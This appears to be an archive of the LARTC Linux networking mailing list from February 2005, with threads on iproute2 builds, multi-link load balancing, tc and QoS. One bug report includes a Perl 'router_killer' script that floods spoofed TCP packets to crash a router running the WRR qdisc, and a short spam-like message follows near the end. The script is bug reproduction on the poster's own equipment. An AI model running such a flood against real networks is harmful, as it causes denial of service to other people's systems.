<1107315964.718.20.camel@Charon> <200502020450.43552.Andreas.Klauer@metamorpher.de> <1107376926.1549.13.camel@Charon> <18dc01c50922$3b467b20$6e69690a@RIMAS> <4200EAA1.956B5B83@iswest.com> <196501c50939$7be77780$6e69690a@RIMAS> Message-ID: On Wed, 2 Feb 2005 15:11:34 -0000, Remus wrote: > Gypsy, > > I was missing only db31-3-1-17-i486-1, but after it install I still > get the same errors. > > Regards > > Remus > > > > Remus wrote: > >> > >> Hi folks, > >> > >> I just tried to compile the latest (current) iproute2 and got these > >> errors: > >> > >> arpd.c:19:20: db_185.h: No such file or directory > > ==SNIP== > >> make[1]: *** [arpd] Error 1 > >> make[1]: Leaving directory > >> `/home/iproute2/new/Source/Orig/iproute2-050124/misc' > >> make: *** [all] Error 2 > >> > >> My kernel 2.6.10 on Slackware 10 (current) > >> > >> Any ideas? > >> > >> Regards > >> > >> Remus > > > > Install from slackware/l the db3-3.11-i486-4 db31-3-1-17-i486-1 and > > db4-4.2.52-i486-2 libraries. > > > > gypsy > > > > > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > Just edit your Makefile where you find a line like this: --- cut here --- # Path to db_185.h include DBM_INCLUDE:=/usr/include --- and here --- with: #Path to db_185.h include DBM_INCLUDE:=/usr/include/db4/db_185.h Compile and you'll be fine :) From Joe Nuts Wed Feb 2 15:42:11 2005 From: Joe Nuts (Joe Nuts) Date: Wed, 2 Feb 2005 09:42:11 -0600 Subject: [LARTC] Packet Level Load Balance inbound/outbound success with nth and route Message-ID: First of all, I'd like to thank Andy Furniss for his direction and for helping me get a working example up and running. For the following set up to work, you will need a linux computer at the ISP (server), a linux computer at the client location (client), and some a public range of IP's you plan to send down to your client. (as this configuration involves patching the linux kernel, I assume you have already downloaded it, and have previously compiled a kernel) steps to set up the linux computers are ) make sure both computers have forwarding allowed (i do this with a 'net.ipv4.ip_forward = 1' line in my /etc/sysctl.conf) download iptables source, and patch-o-matic files from netfilter.org unzip those files. run the patch-o-matic script. when you get to the 'nth' and 'ROUTE' packages, select Y. then, in the kernel config, under networking options, under netfilter configuration, under iptables support, select nth, and under packet mangling, select ROUTE. compile the kernel, reboot with new kernel. compile iptables, make && make install. even after running make install, on my system, the two iptables libraries didnt make it to /lib/iptables, so i had to copy them manually. (copy libipt_nth.so and libipt_ROUTE.so from the iptables source to /lib/iptables) now, I use GRE tunnels from the server to the client to send inbound traffic, I assume you can use any kind of tunnel, just make sure support for whatever you want to use is installed in to the kernel. for the sake of the example, IP's will be defined as follows : Local IP at client : 66.81.23.1 (eth0) DSL #1 at client : 64.20.12.46 (eth1) (64.20.12.45 is gateway) DSL #2 at client : 64.20.12.50 (eth2) (64.20.12.49 is gateway) Public IP of server : 66.80.22.30 Public IP Range sent to client : 66.81.23.0/24 the tunnels need to be set up on both the client and the server --server-- ip tunnel add client_tun1 mode gre remote 66.20.12.46 local 66.80.22.30 ttl 255 ip tunnel add client_tun2 mode gre remote 66.20.12.50 local 66.80.22.30 ttl 255 ip link set client_tun1 up ip link set client_tun2 up ip addr add 172.16.0.1/30 dev client_tun1 ip addr add 172.16.0.5/30 dev client_tun2 --client-- ip tunnel add client_tun1 mode gre remote 66.80.22.30 local 66.20.12.46 ttl 255 ip tunnel add client_tun2 mode gre remote 66.80.22.30 local 66.20.12.50 ttl 255 ip link set client_tun1 up ip link set client_tun2 up ip addr add 172.16.0.2/30 dev client_tun1 ip addr add 172.16.0.6/30 dev client_tun2 traffic outbound from the client doesnt need to go out the tunnel, but it does need to be split --client-- iptables -A POSTROUTING --source 66.81.23.0/24 -t mangle -m nth --counter 0 --every 2 --packet 0 -j ROUTE --oif eth1 --gw 64.20.12.45 iptables -A POSTROUTING --source 66.81.23.0/24 -t mangle -m nth --counter 0 --every 2 --packet 1 -j ROUTE --oif eth2 --gw 64.20.12.49 traffic inbound to the client will go to the server, and come to client through the tunnel --server-- iptables -A POSTROUTING --destination 66.81.23.0/24 -t mangle -m nth --counter 0 --every 2 --packet 0 -j ROUTE --oif client_tun1 --gw 172.16.0.2 iptables -A POSTROUTING --destination 66.81.23.0/24 -t mangle -m nth --counter 0 --every 2 --packet 1 -j ROUTE --oif client_tun2 --gw 172.16.0.6 Of course this set up can be used to divide across more than two links, just duplicate / modify the lines as needed. Computers behind the client can now be given public IP's in that range, set their gateway to 66.81.23.1, and they're up and running on both lines. I hope this helps someone like me! Sincerely, Joe Comeaux From rmocius@auste.elnet.lt Wed Feb 2 15:57:36 2005 From: rmocius@auste.elnet.lt (Remus) Date: Wed, 2 Feb 2005 15:57:36 -0000 Subject: [LARTC] iproute2 compilation problem References: <1107315964.718.20.camel@Charon> <200502020450.43552.Andreas.Klauer@metamorpher.de> <1107376926.1549.13.camel@Charon> <18dc01c50922$3b467b20$6e69690a@RIMAS> <4200EAA1.956B5B83@iswest.com> <196501c50939$7be77780$6e69690a@RIMAS> Message-ID: <19bc01c5093f$ea712380$6e69690a@RIMAS> That have worked for me. Thanks Remus > Just edit your Makefile where you find a line like this: > > --- cut here --- > # Path to db_185.h include > DBM_INCLUDE:=/usr/include > --- and here --- > > with: > > #Path to db_185.h include > DBM_INCLUDE:=/usr/include/db4/db_185.h > > Compile and you'll be fine :) From sanjeev_ravindran@linuxmail.org Wed Feb 2 16:42:52 2005 From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran) Date: Thu, 03 Feb 2005 00:42:52 +0800 Subject: [LARTC] Issue with using using tc api Message-ID: <20050202164252.5A5E32B2BD0@ws5-7.us4.outblaze.com> Hi , I'm trying to call the tc_qdisc_modify function of tc in iproute2/tc. I cou= ld compile it with my stub program and got the executable. However, when i = try to create an htb qdisc i get the following error : Unknown qdisc "htb",= hence option "default" is unparsable However, if i use the tc tool, it works fine.. When I tried to understand t= he problem, it appeared to be failing of dlopen to load the module.. But wh= en i use tc tool, it loads this module.. Any help in this regard will be most appreciated.. Thanks in advance, With best regards, Sanjeev --=20 ______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org=20 This allows you to send and receive SMS through your mailbox. Powered by Outblaze From nistnet_user@yahoo.com Wed Feb 2 17:48:02 2005 From: nistnet_user@yahoo.com (js si) Date: Wed, 2 Feb 2005 09:48:02 -0800 (PST) Subject: [LARTC] doubts: cross compiling iproute2 Message-ID: <20050202174802.72999.qmail@web41508.mail.yahoo.com> --0-60542584-1107366482=:72382 Content-Type: text/plain; charset=us-ascii i tried to cross compile iproute2 on a linux machine using a cross compiler for ppc750. i have some questions: 1) make tries to execute tc/normal, tc/paretonormal, tc/pareto to make distribution files like normal.dist because i am cross compiling the object files can't be executed. will it suffice if i copy the distribution files from my linux iproute2 compilation to the /usr/lib/tc directory on the ppc? 2)i can't locate db_185.h for the ppc. so i don't specify DBM_INCLUDE in the make file. i get compilation errors in the misc directory. the thing is that i want to only use the tc command from the iproute2 package. is tc independent from whatever is compiled in the misc directory? actually tc worked on the ppc, but i just had a doubt. thanks. --------------------------------- Do you Yahoo!? Yahoo! Search presents - Jib Jab's 'Second Term' --0-60542584-1107366482=:72382 Content-Type: text/html; charset=us-ascii
i tried to cross compile iproute2 on a linux machine using a cross compiler for ppc750. i have some questions:
 
1) make tries to execute tc/normal, tc/paretonormal, tc/pareto to make distribution files like normal.dist
because i am cross compiling the object files can't be executed. will it suffice if i copy the distribution files from my linux iproute2 compilation to the /usr/lib/tc directory on the ppc?
 
2)i can't locate db_185.h for the ppc. so i don't specify DBM_INCLUDE in the make file. i get compilation errors in the misc directory. the thing is that i want to only use the tc command from the iproute2 package. is tc independent from whatever is compiled in the misc directory? actually tc worked on the ppc, but i just had a doubt.
 
thanks.

Do you Yahoo!?
Yahoo! Search presents - Jib Jab's 'Second Term' --0-60542584-1107366482=:72382-- From gdamjan@mail.net.mk Wed Feb 2 18:28:51 2005 From: gdamjan@mail.net.mk (Damjan) Date: Wed, 2 Feb 2005 19:28:51 +0100 Subject: [LARTC] How to bond pppoe links In-Reply-To: <41FF39C4.2070603@draxinusom.ch> References: <20050131222309.GA31550@legolas.on.net.mk> <41FF39C4.2070603@draxinusom.ch> Message-ID: <20050202182850.GA5871@legolas.on.net.mk> > Yes it is possible, though it may make only sense iff you have several > clients behind the gateway (since for example http is a stateless > protocol where most often every single picture and page is fetched using > another tcp connection and if you balance it always, you are constantly > switching the source ip which breaks ssl and session tracking. Generally > you always use the same link for the same destination, which means less > balancing, so you need more clients to even it out again) > > But for help, I have found the nano-howto extremely useful. > http://www.ssi.bg/~ja/nano.txt I think this will work... I've made some preliminary tests, a simple multipath default route: ip route add default proto static nexthop dev ppp0 nexthop dev ppp1 and I saw packets going out from both of the interfaces. I've also tried to setup MLPPP on the PPPOE links but it seems that the DSLAM on the other side didn't support this. -- damjan | дамјан This is my jabber ID --> damjan@bagra.net.mk <-- not my mail address!!! From lartc@draxinusom.ch Wed Feb 2 19:21:56 2005 From: lartc@draxinusom.ch (Rene Gallati) Date: Wed, 02 Feb 2005 20:21:56 +0100 Subject: [LARTC] How to bond pppoe links In-Reply-To: <20050202182850.GA5871@legolas.on.net.mk> References: <20050131222309.GA31550@legolas.on.net.mk> <41FF39C4.2070603@draxinusom.ch> <20050202182850.GA5871@legolas.on.net.mk> Message-ID: <42012854.7020009@draxinusom.ch> Damjan wrote: [..] >> >>But for help, I have found the nano-howto extremely useful. >>http://www.ssi.bg/~ja/nano.txt >=20 >=20 > I think this will work... I've made some preliminary tests, a simple > multipath default route: > ip route add default proto static nexthop dev ppp0 nexthop dev ppp1 > and I saw packets going out from both of the interfaces. >=20 > I've also tried to setup MLPPP on the PPPOE links but it seems that the= > DSLAM on the other side didn't support this. If you want true bonding, you need someone on the other side of the=20 links to "unbundle" for you. That means either your ISP(s) or you can=20 also have a system on the internet and create a tunnel to that host over = the links. It was described today under the subject "Packet Level Load=20 Balance inbound/outbound success with nth and route". If you are not going to get a cooperative partner on the other side of=20 the links, the loadbalancing described in nano is about the best you can = do. Please note that you absolutely need some of the other lines if you have = incoming traffic. Traffic might come in through one but leave by the=20 other interface with the wrong IP address otherwise. This is not always=20 bad and often works if all links go over the same ISP. I have one cable=20 and one dsl line from two different providers. I had a bit assymetric=20 routing until I corrected it. --=20 C U - -- ---- ----- -----/\/ Ren=C3=A9 Gallati \/\---- ----- --- -- -= From shemminger@osdl.org Wed Feb 2 21:24:28 2005 From: shemminger@osdl.org (Stephen Hemminger) Date: Wed, 2 Feb 2005 13:24:28 -0800 Subject: [LARTC] doubts: cross compiling iproute2 In-Reply-To: <20050202174802.72999.qmail@web41508.mail.yahoo.com> References: <20050202174802.72999.qmail@web41508.mail.yahoo.com> Message-ID: <20050202132428.19cca099@localhost.localdomain> On Wed, 2 Feb 2005 09:48:02 -0800 (PST) js si wrote: > i tried to cross compile iproute2 on a linux machine using a cross compiler for ppc750. i have some questions: > > 1) make tries to execute tc/normal, tc/paretonormal, tc/pareto to make distribution files like normal.dist > because i am cross compiling the object files can't be executed. will it suffice if i copy the distribution files from my linux iproute2 compilation to the /usr/lib/tc directory on the ppc? Format of these files is text, intentionally to make them portable > 2)i can't locate db_185.h for the ppc. so i don't specify DBM_INCLUDE in the make file. i get compilation errors in the misc directory. the thing is that i want to only use the tc command from the iproute2 package. is tc independent from whatever is compiled in the misc directory? actually tc worked on the ppc, but i just had a doubt. Only needed for arpd, which you probably don't need > thanks. > > > --------------------------------- > Do you Yahoo!? > Yahoo! Search presents - Jib Jab's 'Second Term' From dan@coverfire.com Wed Feb 2 21:26:26 2005 From: dan@coverfire.com (Dan Siemon) Date: Wed, 02 Feb 2005 16:26:26 -0500 Subject: [LARTC] Issue with using using tc api In-Reply-To: <20050202164252.5A5E32B2BD0@ws5-7.us4.outblaze.com> References: <20050202164252.5A5E32B2BD0@ws5-7.us4.outblaze.com> Message-ID: <1107379586.29448.2.camel@ganymede> On Thu, 2005-03-02 at 00:42 +0800, sanjeev ravindran wrote: > I'm trying to call the tc_qdisc_modify function of tc in iproute2/tc. I could compile it with my stub program and got the executable. However, when i try to create an htb qdisc i get the following error : Unknown qdisc "htb", hence option "default" is unparsable > > However, if i use the tc tool, it works fine.. When I tried to understand the problem, it appeared to be failing of dlopen to load the module.. But when i use tc tool, it loads this module.. The internal code of TC is not designed to be used by other projects. LQL[1] may be closer to what you want. Or if you prefer C#, I will be releasing lql-sharp in the next day or so. [1] - http://www.coverfire.com/lql/ -- OpenPGP key: http://www.coverfire.com/files/pubkey.txt Key fingerprint: FB0A 2D8A A1E9 11B6 6CA3 0C53 742A 9EA8 891C BD98 From shemminger@osdl.org Wed Feb 2 21:28:53 2005 From: shemminger@osdl.org (Stephen Hemminger) Date: Wed, 2 Feb 2005 13:28:53 -0800 Subject: [LARTC] Issue with using using tc api In-Reply-To: <20050202164252.5A5E32B2BD0@ws5-7.us4.outblaze.com> References: <20050202164252.5A5E32B2BD0@ws5-7.us4.outblaze.com> Message-ID: <20050202132853.5d550932@localhost.localdomain> On Thu, 03 Feb 2005 00:42:52 +0800 "sanjeev ravindran" wrote: > Hi , > > I'm trying to call the tc_qdisc_modify function of tc in iproute2/tc. I could compile it with my stub program and got the executable. However, when i try to create an htb qdisc i get the following error : Unknown qdisc "htb", hence option "default" is unparsable > > However, if i use the tc tool, it works fine.. When I tried to understand the problem, it appeared to be failing of dlopen to load the module.. But when i use tc tool, it loads this module.. Tc command is hard to understand because it supports using dynamic libraries to add new queue disciplines. To find a queue discipline it first looks for q_XXX.so then opens it's own text with dlopen() and finds the necessary table hooks. This kind of dynamic binding is uncommon in C code, but allows for extensibility. Normally tc has most queue discipline support (ie q_htb) linked into the command directly, but you could build q_htb.so standalone as well. From rsenykoff@harrislogic.com Wed Feb 2 23:12:33 2005 From: rsenykoff@harrislogic.com (rsenykoff@harrislogic.com) Date: Wed, 2 Feb 2005 17:12:33 -0600 Subject: [LARTC] PRIO / CBQ / HTB queue drop algorithm Message-ID: This is a multipart message in MIME format. --=_alternative 007F7DF186256F9C_= Content-Type: text/plain; charset="US-ASCII" Hello all. I've been struggling to QoS VoIP at our site and have a successful implementation at this point. Basically I had to set aside enough bandwidth for VoIP by placing all other traffic behind an HTB (multiple classes and queues behind it). Everything is fine. Here's the diagram: ------- | eth | ------- | -------- | PRIO | -------- / \ 1/ 2\ --------- \ | PFIFO | --------------------- | VoIP | | Hier. Token Bucket | <-- throttled so it + VoIP won't overrun --------- ---------------------- the ethernet link (we know how many / 2| 3| \ phones we have so this is possible 1/ --------- --------- 4\ until you get into conferencing etc) --------- | PFIFO | | PFIFO | --------- | PFIFO | | video | | inst. | | fair | |citrix | --------- | msgr | | SFQ | --------- --------- | bulk | --------- I tried using CBQ and HTB as the higher level queues, but it seems that with lending of traffic out, there is a delay (waiting for space in the queue) where packets from VoIP will get dropped until there's space. I'm guessing that the queues all use a basic tail-drop algorithm. Have I been doing something wrong? It sure would be cool to be able to provide immediate bandwidth to VoIP (and other interactive applications) while still letting those interactive traffic classes lend out bandwidth. For example, an option on PRIO that lets you specify random drop, and what bands to drop from. Thus, if a VoIP packet arrives and the queue is full, rather than dropping the VoIP packet, randomly drop a packet from the bulk traffic band of the PRIO queue. Any thoughts on this are very welcome. TIA! -Ron S. --=_alternative 007F7DF186256F9C_= Content-Type: text/html; charset="US-ASCII"
Hello all.

I've been struggling to QoS VoIP at our site and have a successful implementation at this point. Basically I had to set aside enough bandwidth for VoIP by placing all other traffic behind an HTB (multiple classes and queues behind it). Everything is fine. Here's the diagram:

         -------
         | eth |
         -------
            |
         --------
         | PRIO |
         --------
       /          \
    1/             2\
---------             \
| PFIFO |       ---------------------
| VoIP  |       | Hier. Token Bucket | <-- throttled so it + VoIP won't overrun
---------       ----------------------     the ethernet link (we know how many
              /     2|        3|       \   phones we have so this is possible
           1/    --------- ---------    4\ until you get into conferencing etc)
      ---------  | PFIFO | | PFIFO |   ---------    
      | PFIFO |  | video | | inst. |   | fair  |
      |citrix |  --------- | msgr  |   | SFQ   |  
      ---------            ---------   | bulk  |
                                       ---------

I tried using CBQ and HTB as the higher level queues, but it seems that with lending of traffic out, there is a delay (waiting for space in the queue) where packets from VoIP will get dropped until there's space. I'm guessing that the queues all use a basic tail-drop algorithm.

Have I been doing something wrong? It sure would be cool to be able to provide immediate bandwidth to VoIP (and other interactive applications) while still letting those interactive traffic  classes lend out bandwidth. For example, an option on PRIO that lets you specify random drop, and what bands to drop from. Thus, if a VoIP packet arrives and the queue is full, rather than dropping the VoIP packet, randomly drop a packet from the bulk traffic band of the PRIO queue.

Any thoughts on this are very welcome.

TIA!
-Ron S.


--=_alternative 007F7DF186256F9C_=-- From shiman@magma.com.pl Thu Feb 3 00:59:42 2005 From: shiman@magma.com.pl (=?iso-8859-2?Q?Maciej_Szyma=F1ski?=) Date: Thu, 3 Feb 2005 01:59:42 +0100 Subject: [LARTC] Kernel panic when using wrr qd Message-ID: <002e01c5098b$a51f1930$ac15a8c0@shimanesq> For some time now im trying to get to know what causes such configuration of QOS (kernel 2.4.25-2.4.28 + IMQ patch and ofcourse wrr): -- WRR_MAX_CLASSES=200 DEV_IN=imq0 ifconfig $DEV_IN down ifconfig $DEV_IN up tc qdisc add dev ${DEV_IN} handle 1:0 root htb default 10 tc class add dev ${DEV_IN} parent 1:0 classid 1:10 htb rate 1000kbit burst 1kbit prio 1 tc qdisc add dev ${DEV_IN} parent 1:10 handle 10: htb default 190 tc class add dev ${DEV_IN} parent 10: classid 10:10 htb rate 1000kbit burst 20kbit prio 1 tc class add dev ${DEV_IN} parent 10:10 classid 10:190 htb rate 500kbit ceil 900kbit burst 10k prio tc qdisc add dev ${DEV_IN} parent 10:190 handle 190: wrr dest ip $WRR_MAX_CLASSES 0 ###tc qdisc add dev ${DEV_IN} parent 10:190 handle 190:0 esfq perturb 10 limit 64 depth 64 divisor 11 echo "IMQ dev 0 start" /sbin/iptables -F -t mangle /sbin/iptables -A PREROUTING -t mangle -i $DEV_OUT -j IMQ --todev 0 -- Runnig the above and testing it with random packets generated by Nemesis (http://nemesis.sourceforge.net) results in Kernel Panic with random process pid. The packet generation script (destination adresses altered). File router_killer: -- #!/usr/bin/perl $port=9898; for ($c = 1; $c < 100; ++$c) { for ($i = 1; $i < 254; ++$i) { `nemesis tcp -v -S 222.65.61.222 -D 80.50.30.$i -fSA -w 64800 -T 128 -y $port `; `nemesis tcp -v -S 222.65.61.222 -D 80.50.31.$i -fSA -w 64800 -T 128 -y $port `; } } exit(0); -- To kernel panic to occur the subnets 80.50.30.0/24, 80.50.31/24 must be routed to a router witch runs IMQ. Generally speaking it looks as the wrr algorithm from the implementation found at http://wipl-wrr.dkik.dk/wrr/ does not handle larger amounts of IP adresses generated in a short period of time. The tests we ran showed up that the problem lies (at 99%) in the WRR. After running the "router_killer" script in a few seccond the kernel panics. Changeing the queuing algorithm from WRR to ESFQ (in fact commenting the first line of script 1) helps - the router is able to work properly under heavy load (simulated attack). That's how i've come to the conclusion that the problem lies in the WRR itself. Sources of the algo were modified on many ways, everything ending up with the same - kernel panic. From observations we can assume that this is not the problem of filling up the queue because the algorithm should handle it pretty well. If an packet does not fit the queue it gets dropped and also the whole communication afterwards till the queue gets freed. And as we know the queue is controlled by the Qdisc structure and it's mechanisms and not the WRR if ((retvalue=qdisc->enqueue(skb, qdisc)) == ENQUEUE_SUCCESS) { // Successfull sch->stats.packets++; ... if(retvalue!=ENQUEUE_SUCCESS) { // Packet not enqued: sch->stats.drops++; It does not look that the queue could "fill up". Can somebody help (the problem is interresting, im thinking bout posting it on lartc...)? PS1. I've not checked the wrr device implemetation because it's beeing used as a class not as a queuing discipine. Will not work for me. PS2. HTB parameters (rate, ceil) do not matter as the system screws up with every possible combination. From sanjeev_ravindran@linuxmail.org Thu Feb 3 03:43:40 2005 From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran) Date: Thu, 03 Feb 2005 11:43:40 +0800 Subject: [LARTC] Issue with using using tc api Message-ID: <20050203034340.76AE2416118@ws5-2.us4.outblaze.com> Thank you so much for ur response Stephen, Ya, I found that dlopen tries to load q_htb.so.. and it fails..=20 I tried to locate q_htb.so in my rh9 machiene.. but i couldnt locate it.. Could you let me know how build q_htb.so standalone ?? Thanks in advance, With best regards, Sanjeev Ravindran ----- Original Message ----- From: "Stephen Hemminger" To: "sanjeev ravindran" Subject: Re: [LARTC] Issue with using using tc api Date: Wed, 2 Feb 2005 13:28:53 -0800 >=20 > On Thu, 03 Feb 2005 00:42:52 +0800 > "sanjeev ravindran" wrote: >=20 > > Hi , > > > > I'm trying to call the tc_qdisc_modify function of tc in=20 > > iproute2/tc. I could compile it with my stub program and got the=20 > > executable. However, when i try to create an htb qdisc i get the=20 > > following error : Unknown qdisc "htb", hence option "default" is=20 > > unparsable > > > > However, if i use the tc tool, it works fine.. When I tried to=20 > > understand the problem, it appeared to be failing of dlopen to=20 > > load the module.. But when i use tc tool, it loads this module.. >=20 > Tc command is hard to understand because it supports using dynamic=20 > libraries to add new queue disciplines. > To find a queue discipline it first looks for q_XXX.so then opens=20 > it's own text with dlopen() and finds the > necessary table hooks. This kind of dynamic binding is uncommon in=20 > C code, but allows for extensibility. >=20 > Normally tc has most queue discipline support (ie q_htb) linked=20 > into the command directly, but > you could build q_htb.so standalone as well. --=20 ______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org=20 This allows you to send and receive SMS through your mailbox. Powered by Outblaze From beatlelittle@yahoo.com.cn Thu Feb 3 06:08:24 2005 From: beatlelittle@yahoo.com.cn (CcM) Date: Thu, 3 Feb 2005 14:08:24 +0800 (CST) Subject: [LARTC] Anyone have the userguide's tc script and the corresponding ethloop input files? In-Reply-To: <200501311715.15302.stef.coene@docum.org> Message-ID: <20050203060824.52996.qmail@web15504.mail.cnb.yahoo.com> --0-460035923-1107410904=:50430 Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 8bit Thanks a lot, it's really a good way, I'll try it! Stef Coene wrote: On Monday 31 January 2005 04:26, CcM wrote: > I'm trying to get picture from ethloop and gnuplot. But the output seems > weird. I still do not know why and want some examples. > > Thanks in advance. This is the only script I found. It uses monitor.pl that I use to get the counters. But you can also see the original code from Devik in comments that uses ethloop. I hope this will help you. burst.sh is a script that creates the tc setup I want to test. client1 and client2 are actually ttcp commands to generate traffic. So the script launchs 2 programs to generate traffic, monitor.pl to get some counters, kills the running ttcp programs, parse the output and use gnuplot to plot it. # set -x CEIL="1000kbps" ./burst.sh $CEIL (sleep 3 ; ./client1 ) & (sleep 6 ; ./client2 ) & monitor.pl end=30 sleep=500000 kill `ps -ef | grep ttcp | awk '{print $3}'` kill `ps -ef | grep ttcp | awk '{print $2}'` DATA=/tmp/bb_speed.log PIX="OUT.png" #DATA=$1.out #PROG=$1 #PIX=$2.png #if [ "$2" = "" ]; then PIX=$1.png; fi #ethloop < $1 > $1.out #cat >.plotperl <<"EOF" #$ln=0; $lx=-1000; #while (<>) { #if(/^(\d+)\s+R\s+(\d+)\s+(\d+)/) { #$x = $1/1000; $y = -0.1; $y1 = $y+0.02; $y2 = $y + 0.05; #if ($x-$lx<2) { $ln=($ln+1)%3; } else { $ln=0; } #$y-=$ln*0.04; $lx=$x; $lb=$3; #$lb=int($3/1000)."k" if ($lb>=10000); #print "set label '$2:$lb' at $x,graph $y center\n"; #print "set arrow from $x,graph $y1 to $x,graph $y2\n"; #} #} #EOF #perl .plotperl $PROG > .plot cat >.plot Thanks a lot, it's really a good way, I'll try it!
 

Stef Coene <stef.coene@docum.org> wrote:
On Monday 31 January 2005 04:26, CcM wrote:
> I'm trying to get picture from ethloop and gnuplot. But the output seems
> weird. I still do not know why and want some examples.
>
> Thanks in advance.
This is the only script I found.
It uses monitor.pl that I use to get the counters. But you can also see the
original code from Devik in comments that uses ethloop. I hope this will
help you.
burst.sh is a script that creates the tc setup I want to test. client1 and
client2 are actually ttcp commands to generate traffic. So the script
launchs 2 programs to generate traffic, monitor.pl to get some counters,
kills the running ttcp programs, parse the output and use gnuplot to plot it.

# set -x
CEIL="1000kbps"

./burst.sh $CEIL

(sleep 3 ; ./client1 ) &
(sleep 6 ; ./client2 ) &

monitor.pl end=30 sleep=500000
kill `ps -ef | grep ttcp | awk '{print $3}'`
kill `ps -ef | grep ttcp | awk '{print $2}'`
DATA=/tmp/bb_speed.log
PIX="OUT.png"

#DATA=$1.out
#PROG=$1
#PIX=$2.png
#if [ "$2" = "" ]; then PIX=$1.png; fi

#ethloop < $1 > $1.out

#cat >.plotperl <<"EOF"
#$ln=0; $lx=-1000;
#while (<>) {
#if(/^(\d+)\s+R\s+(\d+)\s+(\d+)/) {
#$x = $1/1000; $y = -0.1; $y1 = $y+0.02; $y2 = $y + 0.05;
#if ($x-$lx<2) { $ln=($ln+1)%3; } else { $ln=0; }
#$y-=$ln*0.04; $lx=$x; $lb=$3;
#$lb=int($3/1000)."k" if ($lb>=10000);
#print "set label '$2:$lb' at $x,graph $y center\n";
#print "set arrow from $x,graph $y1 to $x,graph $y2\n";
#}
#}
#EOF
#perl .plotperl $PROG > .plot

cat >.plot <set y2t
set title "HTB burst test, ceil = $CEIL"
set grid
set nokey
set bmargin 5
set key spacing 1.4 box
set data style linespoints
set term png medium color xffffff x000000 x404040 xc00000 x009000 x0000ff
xc09000 xc000c0 x0090c0 x804020
#set term png small xffffff x000000 x404040 xc00000 x009000 x0000ff \\
#xc09000 xc000c0 x0090c0 x804020
set out "$PIX"
set label "time [s]" at graph -0.02,graph -0.05 right
set ylabel "rate [Bps]"
set ytics nomirror
#set noy2tics

plot '$DATA' using (\$1/2):2 title 'flow 1 rate',\\
'$DATA' using (\$1/2):4 title 'flow 2 rate',\\
'$DATA' using (\$1/2):(\$2+\$4) title 'total rate (0+1)'

EOF

gnuplot .plot
#xview $PIX
cp $PIX $CEIL.png
_______________________________________________
LARTC mailing list / LARTC@mailman.ds9a.nl
http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/


Do You Yahoo!?
×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-460035923-1107410904=:50430-- From beatlelittle@yahoo.com.cn Thu Feb 3 06:11:57 2005 From: beatlelittle@yahoo.com.cn (CcM) Date: Thu, 3 Feb 2005 14:11:57 +0800 (CST) Subject: [LARTC] What does flowid:1 mean here? Message-ID: <20050203061157.53279.qmail@web15504.mail.cnb.yahoo.com> --0-1121976442-1107411117=:51972 Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 8bit Hi, I got the following lines from 'Linux Advanced Routing & Traffice Control HOWTO' and got confused! iptables -A PREROUTING -i $INDEV -t mangle -p tcp --syn \ -j MARK --set-mark 1 tc qdisc add dev $INDEV handle ffff: ingress tc filter add dev $INDEV parent ffff: protocol ip prio 50 handle 1 fw \ police rate 1kbit burst 40 mtu 9k drop flowid :1 Does the second command mean that the filter will police the traffic of syn to 1kbit by dropping? What does flowid:1 mean here? Thanks in advance. CcM --------------------------------- Do You Yahoo!? ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-1121976442-1107411117=:51972 Content-Type: text/html; charset=gb2312 Content-Transfer-Encoding: 8bit
Hi,
     I got the following lines from 'Linux Advanced Routing & Traffice Control HOWTO' and got confused!
 
     iptables -A PREROUTING -i $INDEV -t mangle -p tcp --syn \
     -j MARK --set-mark 1
     tc qdisc add dev $INDEV handle ffff: ingress
     tc filter add dev $INDEV parent ffff: protocol ip prio 50 handle 1 fw \
     police rate 1kbit burst 40 mtu 9k drop flowid :1
 
     Does the second command mean that the filter will police the traffic of syn to 1kbit by dropping? What does flowid:1 mean here?
 
Thanks in advance.
CcM


Do You Yahoo!?
×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-1121976442-1107411117=:51972-- From 64vn@cardvn.net Thu Feb 3 07:46:41 2005 From: 64vn@cardvn.net (Nguyen Dinh Nam) Date: Thu, 03 Feb 2005 14:46:41 +0700 Subject: [LARTC] Tutorial: Setting up a server with multiple internet connections Message-ID: <4201D6E1.2010508@cardvn.net> I know people are using nano-howto (http://www.ssi.bg/~ja/nano.txt) to configure a multihomed server, but I don't like it's approach, and it doesn't offer a complete solution, especially, AFAIK, nano-howto doesn't tell you to bind each TCP connection to just one up-link, so connections will lost when routing cache expires (most ISPs DROP ip spoofing traffic) So I write a tutorial, I hope that it'll make your life easier: http://selab.edu.ms/twiki/bin/view/Networking/MultihomedLinuxNetworking Your comment is welcome, you can even edit the wiki page directly if desired. From sujith.chennupati@gmail.com Thu Feb 3 11:12:44 2005 From: sujith.chennupati@gmail.com (Sujith.chennupati) Date: Thu, 03 Feb 2005 16:42:44 +0530 Subject: [LARTC] Delivery by mail Message-ID: ----------iqmoxupifwqudqqiywkx Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: 7bit Thanks for use of our software.
